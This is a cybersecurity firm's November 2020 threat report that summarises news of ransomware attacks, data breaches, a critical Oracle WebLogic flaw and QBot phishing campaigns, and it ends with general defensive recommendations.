InForce Cyber

Threat Report November 2020

The month of November was rich of ransomware attacks. Here are some topics to support this statement:

Reuters: Suspected North Korean hackers targeted COVID vaccine maker AstraZeneca

The North Korean hackers posed as recruiters on networking site LinkedIn and WhatsApp in order to approach AstraZeneca staff, including those working on coronavirus research, with fake job offers.

NHS Error Exposes Data on Hundreds of Patients and Staff

Human error at NHS Highland earlier this month led to the personal information of 284 patients with diabetes being shared via email with 31 individuals, according to local reports.

Human error at NHS Highland earlier this month led to the personal information of 284 patients with diabetes being shared via email with 31 individuals, according to local reports.

Canon has finally confirmed that it was the victim of a ransomware attack in early August and that the threat actors also stole data from its servers.

In August, BleepingComputer first revealed the ransomware attack after it has obtained an internal memo that confirmed the outage suffered by Canon a few days before was caused by a ransomware attack.

The memo also reveals that the company has hired an external security firm to investigate the incident.

Ritzau news agency hit by cyber attack

Denmark’s biggest news agency that delivers text and photos to Danish media has been knocked offline following a hacking attack.

„Ritzau has been the target of a hacker attack early this morning. It appears to be a professional attack,“ the news agency’s CEO Lars Vesterloekke said.

„We have now chosen to shut down all our servers because we were unsure how much damage the attack could cause.“

Email and telephones were down and news was instead sent out via an emergency email system.

It was unclear who was behind the attack and when the agency would be back online.

Since 1866, Copenhagen-based Ritzau has distributed information and produced news for Danish media, organisations and companies.

Cyber-attacks Reported on Three US Healthcare Providers

Three healthcare providers in Florida, Georgia, and New York are notifying patients that their protected health information may have been exposed in recent cyber-attacks involving ransoms.

Warnings went out to patients of Advanced Urgent Care of the Florida Keys on November 6 regarding a ransomware attack that took place on March 1, 2020.

According to a breach notice issued by the medical center, patient data was compromised when attackers encrypted files on a backup drive.

GoDaddy Employees Used in Attacks on Multiple Cryptocurrency Services

Fraudsters redirected email and web traffic destined for several cryptocurrency trading platforms over the past week. The attacks were facilitated by scams targeting employees at GoDaddy, the world’s largest domain name registrar. The incident is the latest incursion at GoDaddy that relied on tricking employees into transferring ownership and/or control over targeted domains to fraudsters. In March, a voice phishing scam targeting GoDaddy support employees allowed attackers to assume control over at least a half-dozen domain names, including transaction brokering site escrow.com.

DopplePaymer ransomware targets ‘Big Brother’ producer Endemol Shine

Endemol Shine, the global production company behind television shows such as “Big Brother,” “MasterChef” and “The Voice,” has been struck by a DopplePaymer ransomware attack and sensitive information was stolen.

The attack was confirmed Nov. 26 by Banijay SAS, the parent company of Endemol Shine, which described the attack as a cybersecurity incident involving both Endemol Shine Group and Endemol Shine International networks. The company said it has reason to believe that “certain personal data of current and ex-employees may have been compromised, as well as commercially sensitive information.”

Enel Group hit by ransomware again, Netwalker demands $14 million

Multinational energy company Enel Group has been hit by a ransomware attack for the second time this year. This time by Netwalker, who is asking a $14 million ransom for the decryption key and to not release several terabytes of stolen data. Enel is one of the largest players in the European energy sector, with more than 61 million customers in 40 countries. As of August 10, it ranks 87 in Fortune Global 500, with a revenue of almost $90 billion in 2019.

Enel hit with Netwalker Ransomware attack

In early June, Enel’s internal network was attacked by Snake ransomware, also referred to as EKANS, but the attempt was caught before the malware could spread. On October 19th, a researcher shared a Netwalker ransom note with BleepingComputer that appeared to be from an attack on Enel Group.

Oracle issues emergency patch for CVE-2020-14750 WebLogic Server flaw

Oracle issued an out-of-band security update to address a critical remote code execution issue (CVE-2020-14750) impacting multiple Oracle WebLogic Server versions.

Oracle issued an out-of-band security update to address a critical remote code execution (RCE) vulnerability, tracked as CVE-2020-14750, which affects several versions of Oracle WebLogic Server.

The IT giant assigned to the flaw a severity base score of 9.8 out of 10.

According to Oracle, the issue was discovered thanks to the information provided by 20 organizations and security experts.

Data Breaches
 Over 2800 e-Shops Running Outdated Magento Software Hit by Credit Card Hackers
A wave of cyberattacks against retailers running the Magento 1.x e-commerce platform earlier this September has been attributed to one single group, according to the latest research.“This group has carried out a large number of diverse Magecart attacks that often compromise large numbers of websites at once through supply chain attacks, such as the Adverline incident, or through the use of exploits such as in the September Magento 1 compromises,“ RiskIQ said in an analysis published today.Collectively called Cardbleed, the attacks targeted at least 2,806 online storefronts running Magento 1.x, which reached end-of-life as of June 30, 2020.
 
130k+ extremely NSFW sexual photos, video and audio leaked by ‘private social network’
The CyberNews investigation team recently discovered an unsecured database containing more than 130,000 extremely sensitive, very explicit private photos, videos, and audio recordings. The database appears to belong to a “private social network” that’s most likely based in China.The sexting – or sex texting/messaging – industry has certainly boomed in 2020 in response to forced isolation in many regions. As Covid-19 has locked down entire populations, individuals are increasingly looking online for digital intimacy when physical intimacy is forbidden or risky. Since people generally want to feel safe when sending these kinds of explicit communications, it can be seen as a betrayal that a platform would be so loose in its security.
Over 20 Million BigBasket Customers Data Exposed in DarkWeb
BigBasket(Innovative Retail Concepts Private Limited) is India’s largest online food and grocery store. It is funded by Alibaba Group, Mirae Asset-Naver Asia Growth Fund, and therefore the UK government-owned CDC group. “Recently BigBasket became victim to a data breach,” reported Cyble. Cyble has indexed the breached information at AmiBreached.com. The Cybel Research team found the database of Big Basket for sale in a cyber-crime market during routine Dark web monitoring, being sold for over $40,000.
Luxottica data breach exposes info of LensCrafters and EyeMed patients
A data breach suffered by Luxottica has exposed the personal and health information of patients of LensCrafters, Target Optical, and EyeMed.Luxottica Group S.p.A. is an Italian eyewear conglomerate and the world’s largest company in the eyewear industry. As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, Pearle Vision, Target Optical, Eyemed vision care plan, and Glasses.com. Its best known brands are Ray-Ban, Persol, and Oakley. Luxottica also makes sunglasses and prescription frames for designer brands such as Chanel, Prada, Giorgio Armani, Burberry, Versace, Dolce and Gabbana, Miu Miu, and Tory Burch.The Italian company employs over 80,000 people and generated 9.4 billion in revenue for 2019.Luxottica was hit by a ransomware attack that took place on September 18.In October, the Italian website “Difesa e Sicurezza” reported that that the Nefilim ransomware operators have posted a long list of files that appear to belong to Luxottica.The huge trove of files appears to be related to the personnel office and finance departments.
QBot Using Election interference Baits in Phishing Campaigns
Following the trend of exploiting major world events, a new spam campaign has been observed delivering malicious attachments that exploit concerns and curiosity about the 2020 U.S. election process. QBot causing interferenceRecently, Malwarebytes Labs Threat Intelligence Team spotted a campaign with U.S. election-themed phishing emails, leveraging a new template.In this campaign, threat actors were using hijacked email threads to push bogus DocuSign documents to lure potential victims into opening bait documents and enabling macros used to drop malware payloads.QBot operators used this tactic to add legitimacy to the scam and earn the victim’s trust.The malware was not only infecting the victims’ computers but it also started collecting emails that could be used as part of their next malspam campaigns. Recent Qbot attacksIn October, QBot was seen using Windows Defender Antivirus phishing bait to infect target computers.In several instances, Emotet was seen dropping Qbot malware as a first stage or as a secondstage malware payload.In August, Qbot’s malspam campaigns were spreading globally and infecting targets to steal emails from a user’s Outlook client for future exploitation.

Security Threats By Trend

Vulnerability Summary June 2020

Following vulnerabilities, were rated “CRITICAL” by Microsoft

Recommendations

  1. Following Microsoft critical vulnerabilities, update all vulnerable services
  2. Only allow traffic to necessary and well secured ports
  3. Update AV solutions
  4. Phishing training for the employees.
  5. Regular pentests would identify possible weak points
  6. Encrypt data in transit and in rest

 Sources:

Exploit-DB
McAfeee
TrendMicro
Symantec
NIST
Google
FireEye